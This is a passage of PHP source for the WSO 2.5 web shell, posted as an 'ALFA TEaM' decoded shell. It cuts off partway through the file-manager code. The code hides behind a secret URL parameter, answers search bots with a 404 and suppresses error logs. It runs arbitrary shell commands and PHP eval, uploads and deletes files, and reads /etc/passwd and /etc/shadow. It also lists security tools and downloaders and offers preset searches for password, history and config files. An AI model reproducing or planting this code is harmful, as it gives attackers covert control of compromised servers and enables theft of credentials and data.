ALFA TEaM SHeLL Decoder By Eddie Kidiw

1. <?php
2. /*
3. * ALFA TEaM SHeLL Decoder By Eddie Kidiw
4. * Full Source Decoder: http://pastebin.com/Tyz8shbS
5. * Full Source Encoder: http://pastebin.com/UNyaR0h3
6. * Decoder Time: Saturday, Desember 19 2015
7. * @author sole sad & Invisible
8. * @solevisible@gmail.com
9. * @copyright 2014
10. */
11. if(isset($_GET["solevisible"])){
12. $auth_pass="";
13. $color="#df5";
14. $default_action="FilesMan";
15. $default_use_ajax=true;
16. $default_charset="Windows-1251";
17.  
18. if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define('WSO_VERSION', '2.5'); if(get_magic_quotes_gpc()) { function WSOstripslashes($array) { return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array); } $_POST = WSOstripslashes($_POST); $_COOKIE = WSOstripslashes($_COOKIE); } function wsoLogin() { die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"); } function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } if(!empty($auth_pass)) { if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) wsoLogin(); } if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax; if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function wsoHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; global $color; echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."</title>
19. <style>
20. body{background-color:#444;color:#e1e1e1;}
21. body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
22. table.info{ color:#fff;background-color:#222; }
23. span,h1,a{ color: $color !important; }
24. span{ font-weight: bolder; }
25. h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
26. div.content{ padding: 5px;margin-left:5px;background-color:#333; }
27. a{ text-decoration:none; }
28. a:hover{ text-decoration:underline; }
29. .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
30. .bigarea{ width:100%;height:300px; }
31. input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
32. form{ margin:0px; }
33. #toolsTbl{ text-align:center; }
34. .toolsInp{ width: 300px }
35. .main th{text-align:left;background-color:#5e5e5e;}
36. .main tr:hover{background-color:#5e5e5e}
37. .l1{background-color:#444}
38. .l2{background-color:#333}
39. pre{font-family:Courier,Monospace;}
40. </style>
41. <script>
42. var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
43. var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
44. var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
45. var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
46. var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
47. var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
48. var d = document;
49. function set(a,c,p1,p2,p3,charset) {
50. if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
51. if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
52. if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
53. if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
54. if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
55. if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
56. }
57. function g(a,c,p1,p2,p3,charset) {
58. set(a,c,p1,p2,p3,charset);
59. d.mf.submit();
60. }
61. function a(a,c,p1,p2,p3,charset) {
62. set(a,c,p1,p2,p3,charset);
63. var params = 'ajax=true';
64. for(i=0;i<d.mf.elements.length;i++)
65. params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
66. sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
67. }
68. function sr(url, params) {
69. if (window.XMLHttpRequest)
70. req = new XMLHttpRequest();
71. else if (window.ActiveXObject)
72. req = new ActiveXObject('Microsoft.XMLHTTP');
73. if (req) {
74. req.onreadystatechange = processReqChange;
75. req.open('POST', url, true);
76. req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
77. req.send(params);
78. }
79. }
80. function processReqChange() {
81. if( (req.readyState == 4) )
82. if(req.status == 200) {
83. var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
84. var arr=reg.exec(req.responseText);
85. eval(arr[2].substr(0, arr[1]));
86. } else alert('Request error!');
87. }
88. </script>
89. <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
90. <form method=post name=mf style='display:none;'>
91. <input type=hidden name=a>
92. <input type=hidden name=c>
93. <input type=hidden name=p1>
94. <input type=hidden name=p2>
95. <input type=hidden name=p3>
96. <input type=hidden name=charset>
97. </form>"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://exploit-db.com/search/?action=search&filter_description='; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for($j=0; $j<=$i; $j++) $cwd_links .= $path[$j].'/'; $cwd_links .= "\")'>".$path[$i]."/</a>"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>'; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; $drives = ""; if($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if(is_dir($drive.':\\')) $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; } echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="' . $explink . '" target=_blank>[exploit-db.com]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=green><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">'; } function wsoFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" <font color='green'>(Writeable)</font>":" <font color=red>(Not writable)</font>"; echo "
98. </div>
99. <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
100. <tr>
101. <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
102. <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
103. </tr><tr>
104. <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
105. <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
106. </tr><tr>
107. <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
108. <td><form method='post' ENCTYPE='multipart/form-data'>
109. <input type=hidden name=a value='FilesMAn'>
110. <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
111. <input type=hidden name=p1 value='uploadFile'>
112. <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
113. <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
114. </tr></table></div></body></html>"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function wsoEx($in) { $out = ''; if (function_exists('exec')) { @exec($in,$out); $out = @join("\n",$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function wsoViewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function wsoPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function wsoPermsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>'; elseif (!@is_writable($f)) return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>'; else return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>'; } function wsoScandir($dir) { if(function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function wsoWhich($p) { $path = wsoEx('which ' . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { wsoHeader(); echo '<h1>Server security information</h1><div class=content>'; function wsoSecParam($n, $v) { $v = trim($v); if($v) { echo '<span>' . $n . ': </span>'; if(strpos($v, "\n") === false) echo $v . '<br>'; else echo '<pre class=ml1>' . $v . '</pre>'; } } wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); wsoSecParam('Open base dir', @ini_get('open_basedir')); wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; wsoSecParam('Supported databases', implode(', ', $temp)); echo '<br>'; if($GLOBALS['os'] == 'nix') { wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no'); wsoSecParam('OS version', @file_get_contents('/proc/version')); wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '<br>'; $temp=array(); foreach ($userful as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Downloaders', implode(', ',$temp)); echo '<br/>'; wsoSecParam('HDD space', wsoEx('df -h')); wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>'; if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { $temp = ""; for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) $temp .= join(':',$uid)."\n"; } echo '<br/>'; wsoSecParam('Users', $temp); } } } else { wsoSecParam('OS Version',wsoEx('ver')); wsoSecParam('Account Settings',wsoEx('net accounts')); wsoSecParam('User Accounts',wsoEx('net user')); } echo '</div>'; wsoFooter(); } function actionPhp() { if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); ob_start(); eval($_POST['p1']); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n"; echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); wsoHeader(); if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(array ( '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!<img[^>]+>!msiU', ), array ( '', '.e, .v, .h, .h th {$1}', '' ), $tmp); echo str_replace('<h1','<h2', $tmp) .'</div><br>'; } echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; if(!empty($_POST['p1'])) { ob_start(); eval($_POST['p1']); echo htmlspecialchars(ob_get_clean()); } echo '</pre></div>'; wsoFooter(); } function actionFilesMan() { if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!"; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_COOKIE['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); } elseif($_COOKIE['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); } elseif($_COOKIE['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_COOKIE['c']); foreach($_COOKIE['f'] as $f) { if($f == '..') continue; if(@is_file($_COOKIE['c'].$f)) $zip->addFile($_COOKIE['c'].$f, $f); elseif(@is_dir($_COOKIE['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/')); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_COOKIE['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_COOKIE['f'] as $f) { if($zip->open($_COOKIE['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_COOKIE['act'] == 'tar') { chdir($_COOKIE['c']); $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); chdir($GLOBALS['cwd']); } unset($_COOKIE['f']); setcookie('f', '', time() - 3600); break; default: if(!empty($_POST['p1'])) { WSOsetcookie('act', $_POST['p1']); WSOsetcookie('f', serialize(@$_POST['f'])); WSOsetcookie('c', @$_POST['c']); } break; } } wsoHeader(); echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; $dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo "<script>
115. function sa() {
116. for(i=0;i<d.files.elements.length;i++)
117. if(d.files.elements[i].type == 'checkbox')
118. d.files.elements[i].checked = d.files.elements[0].checked;
119. }
120. </script>
121. <table width='100%' class='main' cellspacing='0' cellpadding='2'>
122. <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function wsoCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "wsoCmp"); usort($dirs, "wsoCmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; $l = $l?0:1; } echo "<tr><td colspan=7>
123. <input type=hidden name=a value='FilesMan'>
124. <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
125. <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
